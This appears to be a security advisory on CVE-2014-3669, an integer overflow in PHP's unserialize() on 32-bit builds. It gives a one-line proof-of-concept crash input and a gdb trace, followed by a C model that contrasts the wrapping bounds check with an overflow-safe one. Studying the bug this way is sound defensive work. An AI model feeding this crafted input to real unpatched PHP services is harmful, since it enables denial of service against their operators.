A recently discovered PHP bug allows an integer overflow in unserialize()

The vulnerability, discovered by security researcher Symeon Paraschoudis of htbridge, allows an integer overflow in PHP's unserialize() (versions <= 5.6.1, 5.5.17 and 5.4.33) on 32-bit systems.

The researcher used the radamsa fuzzer (which does both text-based generation and binary file-format mutation) together with a Python script of his own that uses the python-ptrace signal-handling module to catch crashes and categorise them by signal number.

POC:

<?php unserialize('C:3:"GMP":18446744075857035259:{}'); ?>

Result:

The bug is reachable wherever the unserializer is fed user-controlled data: parsing specially crafted serialized input with unserialize() can trigger a crash.

gdb$ r poc.php
Starting program: /home/user/Desktop/php-5.5.17/sapi/cli/php poc.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".
Warning: Class __PHP_Incomplete_Class has no unserializer in /home/user/Desktop/poc.php on line 2
Program received signal SIGSEGV, Segmentation fault.
--------------------------------------------------------------------------[regs]
EAX: 0x3510DAB3 EBX: 0xB510C74C ECX: 0x3510DAB4 EDX: 0xBFFFBA88 o d I t s z A p C
ESI: 0x00000000 EDI: 0x00000000 EBP: 0xBFFFB918 ESP: 0xBFFFB918 EIP: 0x0850505F
CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007B
--------------------------------------------------------------------------[code]
=> 0x850505f <finish_nested_data+16>: movzx eax,BYTE PTR [eax]
   0x8505062 <finish_nested_data+19>: cmp al,0x7d
.... snip ....
--------------------------------------------------------------------------------
0x0850505f in finish_nested_data (rval=0xbfffbab4, p=0xbfffba88, max=0xb510dab9 "", var_hash=0xbfffba84, tsrm_ls=0x8c81338) at /home/user/Desktop/php-5.5.17/ext/standard/var_unserializer.c:356
356         if (*((*p)++) == '}')
gdb$ bt
#0  0x0850505f in finish_nested_data (rval=0xbfffbab4, p=0xbfffba88, max=0xb510dab9 "", var_hash=0xbfffba84, tsrm_ls=0x8c81338) at /home/user/Desktop/php-5.5.17/ext/standard/var_unserializer.c:356
#1  0x085051bb in object_custom (rval=0xbfffbab4, p=0xbfffba88, max=0xb510dab9 "", var_hash=0xbfffba84, tsrm_ls=0x8c81338, ce=0x8da10d0) at /home/user/Desktop/php-5.5.17/ext/standard/var_unserializer.c:387
#2  0x085062cb in php_var_unserialize (rval=0xbfffbab4, p=0xbfffba88, max=0xb510dab9 "", var_hash=0xbfffba84, tsrm_ls=0x8c81338) at /home/user/Desktop/php-5.5.17/ext/standard/var_unserializer.c:738
#3  0x084f264a in zif_unserialize (ht=0x1, return_value=0xb510c74c, return_value_ptr=0x0, this_ptr=0x0, return_value_used=0x0, tsrm_ls=0x8c81338) at /home/user/Desktop/php-5.5.17/ext/standard/var.c:965
#4  0x0862eeda in zend_do_fcall_common_helper_SPEC (execute_data=0xb50ef08c, tsrm_ls=0x8c81338) at /home/user/Desktop/php-5.5.17/Zend/zend_vm_execute.h:550
#5  0x08633b66 in ZEND_DO_FCALL_SPEC_CONST_HANDLER (execute_data=0xb50ef08c, tsrm_ls=0x8c81338) at /home/user/Desktop/php-5.5.17/Zend/zend_vm_execute.h:2332
#6  0x0862e411 in execute_ex (execute_data=0xb50ef08c, tsrm_ls=0x8c81338) at /home/user/Desktop/php-5.5.17/Zend/zend_vm_execute.h:363
#7  0x0862e4cf in zend_execute (op_array=0xb510cff0, tsrm_ls=0x8c81338) at /home/user/Desktop/php-5.5.17/Zend/zend_vm_execute.h:388
#8  0x085f1f1d in zend_execute_scripts (type=0x8, tsrm_ls=0x8c81338, retval=0x0, file_count=0x3) at /home/user/Desktop/php-5.5.17/Zend/zend.c:1330
#9  0x08556b7e in php_execute_script (primary_file=0xbfffeee4, tsrm_ls=0x8c81338) at /home/user/Desktop/php-5.5.17/main/main.c:2506
#10 0x0869dee7 in do_cli (argc=0x2, argv=0x8c812a0, tsrm_ls=0x8c81338) at /home/user/Desktop/php-5.5.17/sapi/cli/php_cli.c:994
#11 0x0869f279 in main (argc=0x2, argv=0x8c812a0) at /home/user/Desktop/php-5.5.17/sapi/cli/php_cli.c:1378
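The crash above is a bounds check in object_custom() whose pointer sum wraps on 32-bit: the PoC's length field reduces to 0x7FFFFFFB modulo 2^32, and adding it to the data pointer wraps to the 0x3510DAB3 seen in EAX. The following added example (not PHP's source) models that check with 32-bit offsets next to an overflow-safe form that compares the remaining byte count instead of forming the sum; the buffer layout (string ending at max = 0xb510dab9) and the two-byte skip after the digits are assumptions taken from the trace.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* 32-bit offsets stand in for i386 pointers so the wrap reproduces on any
 * host. Layout constructed from the gdb trace: max = 0xb510dab9 is one past
 * the end of the 33-byte PoC string. */
static const char POC[] = "C:3:\"GMP\":18446744075857035259:{}";
#define POC_MAX  0xb510dab9u
#define POC_BASE (POC_MAX - (uint32_t)(sizeof(POC) - 1))

/* Decimal parse that wraps modulo 2^32, as a 32-bit long does on i386. */
static int32_t parse_long32(const char *s, const char **end) {
    uint32_t v = 0;
    while (*s >= '0' && *s <= '9') v = v * 10u + (uint32_t)(*s++ - '0');
    if (end) *end = s;
    return (int32_t)v;
}

/* Original form: p + datalen is summed first and can wrap below max, so an
 * oversized datalen is accepted. Both checks return 1 when accepted. */
static int check_vulnerable(uint32_t p, uint32_t max, int32_t datalen) {
    return !(datalen < 0 || p + (uint32_t)datalen >= max);
}

/* Overflow-safe form: compare the bytes remaining (max - p, which cannot
 * wrap because p < max) against datalen instead of forming the sum. */
static int check_safe(uint32_t p, uint32_t max, int32_t datalen) {
    return !(datalen < 0 || (max - p) <= (uint32_t)datalen);
}

/* datalen field of the PoC; data starts two bytes past the digits (after
 * ":{"), mirroring the (*p) += 2 in object_custom(). */
static int32_t poc_datalen(uint32_t *data_p) {
    const char *digits = strstr(POC, "\":") + 2, *end;
    int32_t datalen = parse_long32(digits, &end);
    if (data_p) *data_p = POC_BASE + (uint32_t)(end - POC) + 2;
    return datalen;
}

/* Pointer the unpatched path hands to finish_nested_data(): p + datalen. */
static uint32_t poc_wrapped_pointer(void) {
    uint32_t p; int32_t len = poc_datalen(&p);
    return p + (uint32_t)len;
}

int main(void) {
    uint32_t p; int32_t len = poc_datalen(&p);
    printf("datalen=%d data=0x%08x wrapped=0x%08x vulnerable=%d safe=%d\n", len, p,
           poc_wrapped_pointer(), check_vulnerable(p, POC_MAX, len), check_safe(p, POC_MAX, len));
    return 0;
}
```

With only one byte left in the buffer, the original comparison accepts the PoC (the sum wraps below max) while the remaining-bytes form rejects it, and neither rejects a small datalen that genuinely fits.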

The vulnerability has been assigned CVE-2014-3669 and a patch has been released by PHP.